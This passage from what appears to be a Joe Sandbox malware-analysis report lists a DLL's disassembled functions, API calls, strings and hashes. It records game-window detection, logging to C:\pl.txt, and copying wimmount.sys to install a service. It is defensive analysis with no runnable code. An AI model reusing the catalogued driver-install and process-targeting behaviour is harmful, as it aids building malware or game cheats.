                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$Process$ReadVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilege
                                                                                                                                      • String ID: .$E$G$H$e$isre$r$s$v
                                                                                                                                      • API String ID: 438212174-1798147963
                                                                                                                                      • Opcode ID: 3cff7c4b8a0b2108f32cb13b72367a90b0a570153ab9095b973c86b41bcd1f17
                                                                                                                                      • Instruction ID: 72e7554ca36326c768ee7e4c2207e3f2ef395b00e7044aef58fb720d0cd9353e
                                                                                                                                      • Opcode Fuzzy Hash: 3cff7c4b8a0b2108f32cb13b72367a90b0a570153ab9095b973c86b41bcd1f17
                                                                                                                                      • Instruction Fuzzy Hash: 0B51913120C3C49EE301CB64C580A6FBFE6AB9630CF58599DF0C95B252D766D609C727
                                                                                                                                      Function 69E82F90 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 122COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E82FE2
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDEA44), ref: 69E83000
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E83007
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E83021
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E83070
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDEA2C), ref: 69E8308E
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E83095
                                                                                                                                        • Part of subcall function 69EA5DF0: _memset.LIBCMT ref: 69EA5E19
                                                                                                                                        • Part of subcall function 69EA5DF0: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 69EA5E2E
                                                                                                                                        • Part of subcall function 69EA5DF0: wsprintfA.USER32 ref: 69EA5E4F
                                                                                                                                        • Part of subcall function 69EA5DF0: GetTickCount.KERNEL32 ref: 69EA5E5B
                                                                                                                                        • Part of subcall function 69EA5DF0: GetCurrentProcessId.KERNEL32 ref: 69EA5E68
                                                                                                                                        • Part of subcall function 69EA5DF0: __wfopen_s.LIBCMT ref: 69EA5EB8
                                                                                                                                        • Part of subcall function 69EA5DF0: OutputDebugStringA.KERNEL32(?), ref: 69EA5ECC
                                                                                                                                        • Part of subcall function 69EA5DF0: OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA5ED3
                                                                                                                                      • OutputDebugStringA.KERNEL32(CreateGameDllMap: not support yet), ref: 69E830F1
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E830F8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s$Current$CountDirectoryProcessTick_memsetwsprintf
                                                                                                                                      • String ID: C:\pl.txt$CreateGameDllMap: not support yet
                                                                                                                                      • API String ID: 3595199882-2831999525
                                                                                                                                      • Opcode ID: 3d56c68f54125477092fdc8e52b68c00c97def67d83593fd93b5bfd357a260d5
                                                                                                                                      • Instruction ID: 28974ec8f604f7f54979a3eab0c95e6600494c15ee215ab62995ff047c775b39
                                                                                                                                      • Opcode Fuzzy Hash: 3d56c68f54125477092fdc8e52b68c00c97def67d83593fd93b5bfd357a260d5
                                                                                                                                      • Instruction Fuzzy Hash: 2231257B9042119BC700EA94ED00A7FB798FBC93A8F745C2EF94953245D735E909C792
                                                                                                                                      Function 69E9ED80 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 176fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,69E9F4EA,?), ref: 69E9ED96
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,69E9F4EA,?), ref: 69E9EDAD
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,69E9F4EA,?), ref: 69E9EDBE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                      • String ID: 361m2com$Askm2com$HGEM2$Www.MirGom.Com
                                                                                                                                      • API String ID: 1378416451-3242331594
                                                                                                                                      • Opcode ID: 4aac8a1ca368c38b18959cd3003459e571012f0758bfef665b1f4f5a43870413
                                                                                                                                      • Instruction ID: b891dc85cc6bcfaac9078b3ef0890c09a57cacbb086ee250437dee1700f92438
                                                                                                                                      • Opcode Fuzzy Hash: 4aac8a1ca368c38b18959cd3003459e571012f0758bfef665b1f4f5a43870413
                                                                                                                                      • Instruction Fuzzy Hash: 42513C716142019FE7019A38AC45BBA7B99FB82379F344629F951CB381FB72D8494391
                                                                                                                                      Function 69E84480 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 129sleepwindowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E844AF
                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 69E844E5
                                                                                                                                      • _sprintf.LIBCMT ref: 69E8450F
                                                                                                                                        • Part of subcall function 69E83B40: _memset.LIBCMT ref: 69E83B7A
                                                                                                                                        • Part of subcall function 69E83B40: _memset.LIBCMT ref: 69E83B97
                                                                                                                                        • Part of subcall function 69E83B40: GetForegroundWindow.USER32(?,?,?,00000000,?,76933610), ref: 69E83B9F
                                                                                                                                        • Part of subcall function 69E83B40: IsWindowVisible.USER32(00000000), ref: 69E83BAC
                                                                                                                                        • Part of subcall function 69E83B40: GetWindowThreadProcessId.USER32(00000000,?), ref: 69E83BBC
                                                                                                                                      • _sprintf.LIBCMT ref: 69E84551
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E84565
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69E84579
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E84584
                                                                                                                                      • _malloc.LIBCMT ref: 69E845A4
                                                                                                                                      • PostMessageA.USER32(?,000007EA,00000000,00000000), ref: 69E845D1
                                                                                                                                      Strings
                                                                                                                                      • input gametype is : %d g_bFlagChoseMode : %d ,g_pThreadInfo->bChosedFlag : %d, xrefs: 69E84509
                                                                                                                                      • pfnFindGameWindowAndGetType return : type : %d, pid : %d, xrefs: 69E8454B
                                                                                                                                      • C:\pl.txt, xrefs: 69E8455F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window_memset$DebugOutputString_sprintf$ForegroundMessagePostProcessSleepThreadVisible__wfopen_s_malloc
                                                                                                                                      • String ID: C:\pl.txt$input gametype is : %d g_bFlagChoseMode : %d ,g_pThreadInfo->bChosedFlag : %d$pfnFindGameWindowAndGetType return : type : %d, pid : %d
                                                                                                                                      • API String ID: 4187338559-3777402096
                                                                                                                                      • Opcode ID: 5c6490f90aacd33b01788cf1d79760cd3b2aafa14f0c7eed424039949057c8c7
                                                                                                                                      • Instruction ID: fee28f00547f849efbc67661bc06d22df21dc8d87e6e12345b7eac3a2cd8425a
                                                                                                                                      • Opcode Fuzzy Hash: 5c6490f90aacd33b01788cf1d79760cd3b2aafa14f0c7eed424039949057c8c7
                                                                                                                                      • Instruction Fuzzy Hash: 8241F5B59003409BC711DB98D945FAEB3A8FB89718F20466EF96957381E730E905CBA2
                                                                                                                                      Function 69E81030 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 98COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E8106B
                                                                                                                                        • Part of subcall function 69E9E3F0: CoCreateInstance.OLE32(69EDDF60,00000000,00000001,69EDDF50,?,?), ref: 69E9E429
                                                                                                                                      • _memset.LIBCMT ref: 69E8109F
                                                                                                                                      • _strncpy.LIBCMT ref: 69E810C0
                                                                                                                                      • _strncpy.LIBCMT ref: 69E810CC
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E810EB
                                                                                                                                      • OutputDebugStringA.KERNEL32(GetShortCutFile has arguments), ref: 69E81105
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E8110C
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E8112A
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69E8113E
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E81145
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_strncpy$CreateInstance
                                                                                                                                      • String ID: C:\pl.txt$GetShortCutFile has arguments
                                                                                                                                      • API String ID: 2386831223-3219341379
                                                                                                                                      • Opcode ID: 3422ad29d8ab74cc97f4f9ed37bef8960723a3f8b20b1b1eb3d1e585ccb70749
                                                                                                                                      • Instruction ID: cccaf57e1119b930106449e3ba927c28c7b279e1407c2a17744fa033819a3518
                                                                                                                                      • Opcode Fuzzy Hash: 3422ad29d8ab74cc97f4f9ed37bef8960723a3f8b20b1b1eb3d1e585ccb70749
                                                                                                                                      • Instruction Fuzzy Hash: BF31D075504241ABC310DBA49D01FAFB7A8AFC9348F64491EF89897201E731A60DCBE3
                                                                                                                                      Function 69E8E6A0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 161networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _swscanfrecv$_memset_strncmpselect
                                                                                                                                      • String ID: Content-Length$Content-Length: %d $HTTP/$HTTP/%f %d
                                                                                                                                      • API String ID: 2492379719-894279545
                                                                                                                                      • Opcode ID: d72c677da6352e0802d6ae469fbdc540ca419702a9daa9ebec5f5b601035e5b3
                                                                                                                                      • Instruction ID: 39bd7d90cf13c0478a2d2975f121287f5b06d5cdc5847b6257b799ef193d2758
                                                                                                                                      • Opcode Fuzzy Hash: d72c677da6352e0802d6ae469fbdc540ca419702a9daa9ebec5f5b601035e5b3
                                                                                                                                      • Instruction Fuzzy Hash: 4151C2B1908740AFE364EF64DA81BBFB7E4FF85318F60892DE19D82251D7349509CB92
                                                                                                                                      Function 69E9E670 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,69E9F4B4), ref: 69E9E685
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,69E9F4B4), ref: 69E9E69B
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,69E9F4B4), ref: 69E9E6AC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                      • String ID: LyDlq$WeDlq$wsdlq
                                                                                                                                      • API String ID: 1378416451-3202960832
                                                                                                                                      • Opcode ID: da74a795bd00903fa5684b37063c4877cec7891a1caf2e6c01ce81f20d84345d
                                                                                                                                      • Instruction ID: c19928307c06ff7ed54b7d8e09e2c4897095c79ffed684c1a328b0ec5690f38a
                                                                                                                                      • Opcode Fuzzy Hash: da74a795bd00903fa5684b37063c4877cec7891a1caf2e6c01ce81f20d84345d
                                                                                                                                      • Instruction Fuzzy Hash: 73317B726145006BD31151387D4DBBF2A5EFB82376F34863AF651CB2C1FB61890942A2
                                                                                                                                      Function 69EA4AC0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 119COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA4AF3
                                                                                                                                        • Part of subcall function 69EA4990: WSAStartup.WS2_32 ref: 69EA49F1
                                                                                                                                        • Part of subcall function 69EA4990: gethostname.WS2_32(?,00000104), ref: 69EA4A01
                                                                                                                                        • Part of subcall function 69EA4990: __strlwr.LIBCMT ref: 69EA4A0D
                                                                                                                                      • _memset.LIBCMT ref: 69EA4B16
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$Startup__strlwrgethostname
                                                                                                                                      • String ID: 1$B$a$e$k$n$s$t$u
                                                                                                                                      • API String ID: 4043451516-1518658690
                                                                                                                                      • Opcode ID: 406947bfd2b8071f5e976b302b5d21feee454f619f3a3efe0188b606bed72bd8
                                                                                                                                      • Instruction ID: 4521ca7b82b965b84e7d56ef20bef27dbebad3426c8dfb803cdf1cfe585a0603
                                                                                                                                      • Opcode Fuzzy Hash: 406947bfd2b8071f5e976b302b5d21feee454f619f3a3efe0188b606bed72bd8
                                                                                                                                      • Instruction Fuzzy Hash: 1041A27100C3C59ED311CB249454AEFBBD9AB96308F144A9EE4D98B251EB75960CC7E3
                                                                                                                                      Function 69E879D0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 115servicefileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E86F40: LoadLibraryA.KERNEL32 ref: 69E86F96
                                                                                                                                      • _memset.LIBCMT ref: 69E87A38
                                                                                                                                      • _memset.LIBCMT ref: 69E87A52
                                                                                                                                      • _memset.LIBCMT ref: 69E87A6C
                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 69E87A8A
                                                                                                                                      • wsprintfA.USER32 ref: 69E87AA8
                                                                                                                                      • CopyFileA.KERNEL32(C:\Windows\System32\drivers\wimmount.sys,?,00000000), ref: 69E87AC0
                                                                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 69E87AD7
                                                                                                                                        • Part of subcall function 69E87980: CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,69E87AF9), ref: 69E87999
                                                                                                                                        • Part of subcall function 69E87980: GetLastError.KERNEL32 ref: 69E879A3
                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 69E87B72
                                                                                                                                        • Part of subcall function 69E87430: _memset.LIBCMT ref: 69E87469
                                                                                                                                        • Part of subcall function 69E87430: _strncpy.LIBCMT ref: 69E87486
                                                                                                                                      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 69E87B32
                                                                                                                                      Strings
                                                                                                                                      • C:\Windows\System32\drivers\wimmount.sys, xrefs: 69E87ABB
                                                                                                                                      • %s\SysWOW64\%s.sys, xrefs: 69E87AA2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
